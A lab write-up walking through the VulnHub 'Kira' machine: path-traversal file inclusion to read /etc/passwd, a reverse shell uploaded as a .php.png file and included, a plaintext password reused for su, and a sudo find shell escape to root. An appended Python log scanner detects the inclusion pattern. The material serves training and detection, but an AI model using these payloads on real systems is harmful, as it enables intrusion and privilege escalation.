CTF Walk Through | HackProof Academy

23/03/2025 Shad Hussain
CTF Walk Through - Kira - VulnHub

Machine Link : https://www.vulnhub.com/entry/kira-ctf,594/

STEP01
arp-scan -l
FINDING
192.168.31.141
---------------------------------------------------------------------------------------------
STEP02
nmap -sSV -A -Pn -p- 192.168.31.141
FINDING
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
---------------------------------------------------------------------------------------------
STEP03
dirb http://192.168.31.141/
FINDING
==> DIRECTORY: http://192.168.31.141/uploads/
---------------------------------------------------------------------------------------------
STEP04
http://192.168.31.141/
FINDING
PRESS UPLOAD BUTTON, UPLOAD A REVERSE SHELL -- NOT SUCCESSFUL
---------------------------------------------------------------------------------------------
STEP05
http://192.168.31.141/
click the language button beside the upload button
url shows -- http://192.168.0.108/language.php?lang=en.php
check for LFI -- language.php?lang=../../../../../../etc/passwd
it works
---------------------------------------------------------------------------------------------
STEP06
upload a reverse shell as whatever.php.png
and check in -- http://192.168.31.141/uploads/
---------------------------------------------------------------------------------------------
STEP07
at this link -- language.php?lang=../../../../../../var/www/html/uploads/whatever.php.png
open nc -nvlp 1233
hit the link
get the reverse shell
---------------------------------------------------------------------------------------------
STEP08
python3 -c 'import pty; pty.spawn("/bin/bash")'
cd /var/www/html/supersecret-for-Aziz
ls -la
FINDING
bassam-pass.txt
cat bassam-pass.txt
FINDING
Password123!@#
---------------------------------------------------------------------------------------------
STEP09
su bassam
pwd : Password123!@#
sudo -l
FINDING
(ALL : ALL) /usr/bin/find
---------------------------------------------------------------------------------------------
STEP10
in --- https://gtfobins.github.io/gtfobins/find/#shell
find the shell escape of find
FINDING
find . -exec /bin/sh \; -quit
---------------------------------------------------------------------------------------------
STEP11
sudo find . -exec /bin/sh \; -quit
whoami
root
cd /root
ls -la
FINDING
flag.txt
cat flag.txt
FINDING
THM{root-Is_Better-Than_All-of-THEM-31337}
---------------------------------------------------------------------------------------------
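
Added example, not part of the original walkthrough: a defender-side check that flags the STEP05 to STEP07 pattern (path traversal in the lang parameter, and inclusion of a double-extension file from uploads/) in web access logs. The log lines are constructed, the Apache-style log format is an assumption, and the names classify and scan are hypothetical.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in an assumed Apache-style access-log format.
SAMPLE_LOG = """\
192.168.31.50 - - [23/Mar/2025:10:00:01 +0000] "GET /language.php?lang=en.php HTTP/1.1" 200 512
192.168.31.50 - - [23/Mar/2025:10:00:09 +0000] "GET /language.php?lang=../../../../../../etc/passwd HTTP/1.1" 200 1711
192.168.31.50 - - [23/Mar/2025:10:00:15 +0000] "GET /language.php?lang=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1711
192.168.31.50 - - [23/Mar/2025:10:01:30 +0000] "GET /language.php?lang=../../../../../../var/www/html/uploads/whatever.php.png HTTP/1.1" 200 0
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
DOUBLE_EXT_RE = re.compile(r"\.(?:php\d?|phtml|phar)\.[a-z0-9]+$", re.I)

def classify(value):
    """Return the reasons a lang= value looks like file-inclusion abuse."""
    prev = None
    while prev != value:  # decode repeatedly to normalise double encoding
        prev, value = value, unquote(value)
    value = value.replace("\\", "/")
    reasons = []
    if "../" in value or value.startswith("/"):
        reasons.append("traversal")
    if "/uploads/" in value or value.startswith("uploads/"):
        reasons.append("include-from-uploads")
    if DOUBLE_EXT_RE.search(value):
        reasons.append("double-extension")
    return reasons

def scan(log_text, param="lang"):
    """Return (client_ip, decoded_value, reasons) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for value in parse_qs(query).get(param, []):
            reasons = classify(value)
            if reasons:
                hits.append((line.split()[0], value, reasons))
    return hits

if __name__ == "__main__":
    for ip, value, reasons in scan(SAMPLE_LOG):
        print(ip, ",".join(reasons), value)
```

A hit tagged include-from-uploads means a user-writable directory was reachable through the include parameter, which is the combination that turned the failed upload in STEP04 into code execution in STEP07.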
